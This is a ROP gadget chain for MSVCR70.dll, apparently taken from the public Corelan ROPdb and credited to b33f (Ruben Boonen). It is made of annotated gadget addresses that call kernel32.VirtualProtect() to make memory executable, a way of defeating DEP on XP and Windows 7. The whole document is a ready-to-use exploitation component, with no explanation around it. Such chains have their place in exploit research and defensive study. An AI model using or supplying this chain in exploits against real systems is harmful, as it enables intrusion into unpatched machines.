# Tested on: XP/Win7
# Rebase : False
# ASLR : False
# Safeseh : False
# Base : 0x7c000000
# Top : 0x7c054000
# Size : 0x00054000
# Technique : kernel32.VirtualProtect()
# 30-dwords
# Author : b33f (Ruben Boonen)
rop_gadgets =
[
0x7c032c80, # XOR EAX,EAX # RETN
0x7c0126bc, # XCHG EAX,EBP # ADD AL,7C # RETN
0x7c026652, # POP ESI # RETN
0xffffffff, # will be 0x00000000
0x7c03063f, # INC ESI # RETN
0x7c0358a1, # POP EAX # RETN
0x7C0390FD, # VirtualProtect() -> ESI=0 EBP=0 -> 7c039138(VP)-3B
0x7c023a4f, # ADD ESI,DWORD PTR DS:[EAX+EBP+3B] # RETN
0x7c0358a1, # POP EAX # RETN
0x83FF5E94, # neg -> 0x7c00a16c : push esp # ret
0x7c0167cd, # NEG EAX # RETN
0x7c0126b7, # XCHG EAX,EBP # ADD AL,7C # RETN
0x7c03028f, # POP EBX # RETN
0xffffffff, # will be 0x00000000
0x7c01cd53, # INC EBX # XOR AL,AL # RETN
0x7c0358a1, # POP EAX # RETN
0xFFFFFDFF, # Neg is 201-HEX (513-bytes)
0x7c0167cd, # NEG EAX # RETN
0x7c01561c, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
0x7c026484, # POP EDI # RETN
0x7c034e02, # ROP-NOP
0x7c0358a1, # POP EAX # RETN
0xFFFFFFC0, # NEG is 0x40
0x7c0167cd, # NEG EAX # RETN
0x7c026dc4, # MOV EDX,EAX # INC ECX # MOVZX EAX,BYTE PTR DS:[ECX] # ADD EAX,EDX # RETN
0x7c034e01, # POP ECX # RETN
0x7c049001, # lpOldProtect
0x7c0358a1, # POP EAX # RETN
0x90909090, # NOP
0x7c0126b6, # PUSHAD # XCHG EAX,EBP # ADD AL,7C # RETN
].pack("V*")
MSVCR70.dll - v7.00.9466.0
Public Release: Corelan ROPdb